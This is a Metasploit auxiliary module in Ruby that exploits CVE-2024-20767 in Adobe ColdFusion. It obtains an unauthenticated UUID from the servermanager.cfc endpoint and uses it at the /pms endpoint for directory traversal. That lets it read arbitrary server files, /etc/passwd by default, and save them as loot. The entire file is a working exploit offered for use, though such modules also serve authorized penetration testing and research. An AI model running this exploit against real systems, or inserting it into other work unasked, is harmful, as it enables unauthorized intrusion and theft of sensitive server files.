##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
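class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  # Shape of the UUID handed out by servermanager.cfc. Anchored with \A/\z rather
  # than ^/$: with ^/$ a multi-line value could still match on one of its lines and
  # then be copied, CRLF included, into the 'uuid' request header sent in run.
  UUID_REGEX = /\A[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\z/.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read',
        'Description' => %q{
          This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
          '2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
          token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
          UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
        },
        'Author' => [
          'ma4ter', # Analysis & Discovery
          'yoryio', # PoC
          'Christiaan Beek', # Msf module
          'jheysel-r7' # Msf module assistance
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-20767'],
          ['EDB', '52387'],
          ['URL', 'https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html'],
          ['URL', 'https://jeva.cc/2973.html']
        ],
        'DisclosureDate' => '2024-03-12',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8500),
        OptString.new('TARGETURI', [true, 'The base path for ColdFusion', '/']),
        OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
        OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000]),
        # Number of '../' segments prepended to FILE_PATH before it is handed to the pms servlet.
        OptInt.new('DEPTH', [true, 'Traversal Depth', 5]),
      ]
    )
  end

  # Requests the heartbeat from the unauthenticated servermanager.cfc endpoint and
  # extracts the UUID that the /pms endpoint later accepts as its 'uuid' header.
  #
  # @return [String] a lowercase hex UUID matching UUID_REGEX
  # @raise via fail_with when the target does not answer (Unreachable), answers
  #   with a non-200 status, or the XML carries no well-formed UUID (UnexpectedReply)
  def get_uuid
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', '_servermanager', 'servermanager.cfc'),
      'vars_get' => { 'method' => 'getHeartBeat' }
    })
    fail_with(Failure::Unreachable, 'No response from the target when attempting to retrieve the UUID') unless res

    # TODO: give a more detailed error message once we find out why some of the seemingly vulnerable test targets return a 500 here.
    fail_with(Failure::UnexpectedReply, "Received an unexpected response code: #{res.code} when attempting to retrieve the UUID") unless res.code == 200

    # The heartbeat is XML (WDDX-style); the value we want sits at <var name='uuid'><string>...</string></var>.
    uuid = res.get_html_document.xpath('//var[@name=\'uuid\']/string/text()').text
    fail_with(Failure::UnexpectedReply, 'There was no UUID in the response') unless uuid.match?(UUID_REGEX)
    uuid
  end

  # Obtains a UUID, then asks the pms servlet's 'logging' module to return the first
  # NUMBER_OF_LINES lines of FILE_PATH via a DEPTH-deep '../' traversal. Each returned
  # line is printed and the whole result is saved as loot of type 'coldfusion.file'.
  def run
    print_status('Attempting to retrieve UUID ...')
    uuid = get_uuid
    print_good("UUID found: #{uuid}")
    print_status("Attempting to exploit directory traversal to read #{datastore['FILE_PATH']}")

    # Prefix the requested path with DEPTH '../' segments so it climbs out of whatever
    # directory the servlet resolves file_name against (exact base directory not known here).
    traversal_path = '../' * datastore['DEPTH']
    file_path = "#{traversal_path}#{datastore['FILE_PATH']}"

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'pms'),
      'vars_get' => {
        'module' => 'logging',
        'file_name' => file_path,
        'number_of_lines' => datastore['NUMBER_OF_LINES']
      },
      'headers' => { 'uuid' => uuid }
    })

    # Same failure class as get_uuid: a missing response is a reachability problem, not an unknown one.
    fail_with(Failure::Unreachable, 'No response received') unless res
    fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}") unless res.code == 200

    body = res.body.to_s
    # A 200 with fewer than two characters (e.g. an empty body) cannot be the bracketed list we
    # expect; body[1..-2] would be nil and the split below would raise, so fail cleanly instead.
    fail_with(Failure::UnexpectedReply, 'Server responded with 200 but returned no file content') if body.length < 2

    print_good('File content received:')
    # Observed body format is a bracketed, comma-separated list of lines: "[line1, line2, ...]".
    # Dropping the first and last character and splitting on ', ' recovers the lines; a line that
    # itself contains ', ' will be split in two (TODO: confirm the exact server-side serialisation).
    file_contents = body[1..-2].split(', ')
    file_contents.each { |line| print_status(line) }

    stored_path = store_loot('coldfusion.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH'])
    print_good("Results saved to: #{stored_path}")
  end
end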